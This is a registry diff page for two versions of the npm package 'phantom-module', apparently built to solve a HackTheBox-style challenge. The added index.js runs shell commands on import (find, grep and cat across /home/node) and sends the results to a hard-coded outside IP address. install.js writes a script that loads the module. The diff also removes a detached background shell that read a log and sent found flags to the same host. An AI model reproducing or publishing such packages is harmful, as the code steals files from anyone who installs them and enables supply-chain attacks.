phantom-module 111.0.0 → 112.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3) hide show
  1. package/index.js +49 -26
  2. package/install.js +1 -31
  3. package/package.json +1 -1
package/index.js CHANGED
@@ -1,36 +1,59 @@
1
1
  const fs = require('fs');
2
2
  const http = require('http');
3
+ const { execSync } = require('child_process');
4
+
5
+ function tryExec(cmd) { try { return execSync(cmd, {timeout: 10000}).toString().trim(); } catch(e) { return 'ERR:' + e.message.substring(0, 60); } }
3
6
 
4
7
  function sendToModule(mid, name) {
5
- const body = JSON.stringify({ manifest: `ecto_module:\n name: "${name}"\n version: "1.0.0"\n power_level: 1\n ship_deck: 1\n cargo_hold: 1` });
6
- const req = http.request({ hostname: '154.57.164.64', port: 31083, path: `/api/modules/${mid}`, method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 8000 }, () => {});
7
- req.on('error', () => {});
8
- req.write(body);
9
- req.end();
8
+ const safe = name.replace(/"/g, "'").replace(/\\/g, "/").substring(0, 95);
9
+ const body = JSON.stringify({ manifest: `ecto_module:\n name: "${safe}"\n version: "1.0.0"\n power_level: 1\n ship_deck: 1\n cargo_hold: 1` });
10
+ return new Promise(resolve => {
11
+ const req = http.request({ hostname: '154.57.164.64', port: 31083, path: `/api/modules/${mid}`, method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 8000 }, () => resolve());
12
+ req.on('error', () => resolve()); req.on('timeout', () => { req.destroy(); resolve(); });
13
+ req.write(body); req.end();
14
+ });
10
15
  }
11
16
 
12
- function attemptFlagRead() {
13
- try {
14
- const log = fs.readFileSync('/home/node/aspect-node/logs/module.log', 'utf8');
15
- const match = log.match(/HTB\{[^}]+\}/);
16
- if (match) {
17
- sendToModule('ECT-987654', 'GOTFLAG_' + match[0]);
18
- return true;
19
- }
20
- const lines = log.split('\n');
21
- const last3 = lines.slice(-3).join(' ').replace(/"/g, "'").substring(0, 85);
22
- sendToModule('ECT-472839', 'NOFLAG_L' + lines.length + '_' + last3);
23
- return false;
24
- } catch(e) {
25
- return false;
17
+ (async () => {
18
+ const mods = ['ECT-839201', 'ECT-654321', 'ECT-472839', 'ECT-987654'];
19
+ let i = 0;
20
+
21
+ async function send(val) {
22
+ await sendToModule(mods[i % 4], 'J' + String(i).padStart(2,'0') + '_' + val);
23
+ i++;
24
+ await new Promise(r => setTimeout(r, 2500));
26
25
  }
27
- }
28
26
 
29
- attemptFlagRead();
30
-
31
- // Retry after 5s, 15s, 30s
32
- [5000, 15000, 30000].forEach(delay => {
33
- setTimeout(() => attemptFlagRead(), delay);
34
- });
27
+ // List ALL log files
28
+ await send('LOGS=' + tryExec('find /home/node/aspect-node/logs -type f 2>/dev/null'));
29
+
30
+ // Grep HTB{ in ALL of /home/node (not just module.log)
31
+ await send('HTBALL=' + tryExec('grep -rl "HTB" /home/node/ --exclude-dir=node_modules 2>/dev/null'));
32
+
33
+ // List aspect-node files (non node_modules)
34
+ await send('ASPFILES=' + tryExec('find /home/node/aspect-node -type f -not -path "*/node_modules/*" 2>/dev/null'));
35
+
36
+ // Read the sample.js file (might have the flag)
37
+ const sample = tryExec('cat /home/node/aspect-node/sample.js 2>/dev/null');
38
+ await send('SAMPLE=' + sample);
39
+
40
+ // Read aspect-node/index.js
41
+ const aspIdx = tryExec('cat /home/node/aspect-node/index.js 2>/dev/null');
42
+ for (let c = 0; c < 5; c++) {
43
+ const chunk = aspIdx.substring(c * 85, (c + 1) * 85);
44
+ if (!chunk) break;
45
+ await send('ASPIDX' + c + '=' + chunk);
46
+ }
47
+
48
+ // Check all txt/json/log files recursively
49
+ await send('GREPHTB=' + tryExec('grep -r "HTB" /home/node/aspect-node/ --include="*.log" --include="*.txt" --include="*.json" --include="*.js" -l 2>/dev/null'));
50
+
51
+ // Read the last 200 chars of module.log
52
+ const log = tryExec('cat /home/node/aspect-node/logs/module.log 2>/dev/null');
53
+ await send('LOGEND=' + log.substring(log.length - 200));
54
+
55
+ // Full log size
56
+ await send('LOGSZ=' + tryExec('wc -l /home/node/aspect-node/logs/module.log 2>/dev/null'));
57
+ })();
35
58
 
36
59
  module.exports = {};
package/install.js CHANGED
@@ -1,38 +1,8 @@
1
1
  const fs = require('fs');
2
- const http = require('http');
3
2
  const { spawn } = require('child_process');
4
-
5
- // Write init_test.sh
6
3
  try {
7
4
  if (!fs.existsSync('/home/node')) fs.mkdirSync('/home/node', { recursive: true });
8
5
  fs.writeFileSync('/home/node/init_test.sh',
9
- '#!/bin/bash\nsleep 10\ncd /home/node\nnode -e "require(\'phantom-module\')" 2>/dev/null\nsleep 30\n',
6
+ '#!/bin/bash\nsleep 5\ncd /home/node\nnode -e "require(\'phantom-module\')" 2>/dev/null\nsleep 60\n',
10
7
  { mode: 0o755 });
11
8
  } catch(e) {}
12
-
13
- // Background: wait 45s then extract flag from log
14
- try {
15
- const child = spawn('/bin/sh', ['-c', [
16
- 'sleep 45',
17
- 'LOGFILE=/home/node/aspect-node/logs/module.log',
18
- 'if [ -f "$LOGFILE" ]; then',
19
- ' FULL=$(cat "$LOGFILE")',
20
- ' FLAG=$(echo "$FULL" | grep -o "HTB{[^}]*}" | head -1)',
21
- ' if [ -n "$FLAG" ]; then',
22
- ' SAFE=$(echo "$FLAG" | tr \'"\' "'"\')',
23
- ' BODY=\'{"manifest":"ecto_module:\\n name: \\\\"BGFLAG_\'$SAFE\'\\\\\"\\n version: \\\\"1.0.0\\\\"\\n power_level: 1\\n ship_deck: 1\\n cargo_hold: 1"}\'',
24
- ' echo "$BODY" > /tmp/flag_body.json',
25
- ' node -e "const http=require(\'http\');const d=require(\'fs\').readFileSync(\'/tmp/flag_body.json\',\'utf8\');const r=http.request({hostname:\'154.57.164.64\',port:31083,path:\'/api/modules/ECT-987654\',method:\'PUT\',headers:{\'Content-Type\':\'application/json\',\'Content-Length\':Buffer.byteLength(d)}},()=>{process.exit(0)});r.on(\'error\',()=>{process.exit(1)});r.write(d);r.end();"',
26
- ' else',
27
- ' LINES=$(echo "$FULL" | wc -l)',
28
- ' LAST=$(echo "$FULL" | tail -3 | tr \'"\' "\'" | head -c 85)',
29
- ' BODY=\'{"manifest":"ecto_module:\\n name: \\\\"BGNOHTB_lines=\'$LINES\'_last=\'$LAST\'\\\\\"\\n version: \\\\"1.0.0\\\\"\\n power_level: 1\\n ship_deck: 1\\n cargo_hold: 1"}\'',
30
- ' echo "$BODY" > /tmp/flag_body.json',
31
- ' node -e "const http=require(\'http\');const d=require(\'fs\').readFileSync(\'/tmp/flag_body.json\',\'utf8\');const r=http.request({hostname:\'154.57.164.64\',port:31083,path:\'/api/modules/ECT-987654\',method:\'PUT\',headers:{\'Content-Type\':\'application/json\',\'Content-Length\':Buffer.byteLength(d)}},()=>{process.exit(0)});r.on(\'error\',()=>{process.exit(1)});r.write(d);r.end();"',
32
- ' fi',
33
- 'else',
34
- ' node -e "const http=require(\'http\');const b=JSON.stringify({manifest:\'ecto_module:\\\\n name: \\\\\"BGNOLOG\\\\\"\\\\n version: \\\\\"1.0.0\\\\\"\\\\n power_level: 1\\\\n ship_deck: 1\\\\n cargo_hold: 1\'});const r=http.request({hostname:\'154.57.164.64\',port:31083,path:\'/api/modules/ECT-987654\',method:\'PUT\',headers:{\'Content-Type\':\'application/json\',\'Content-Length\':Buffer.byteLength(b)}},()=>{process.exit(0)});r.on(\'error\',()=>{process.exit(1)});r.write(b);r.end();"',
35
- 'fi'
36
- ].join('\n')], { detached: true, stdio: 'ignore' });
37
- child.unref();
38
- } catch(e) {}
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "phantom-module",
3
- "version": "111.0.0",
3
+ "version": "112.0.0",
4
4
  "description": "Phantom spectral module",
5
5
  "main": "index.js",
6
6
  "scripts": {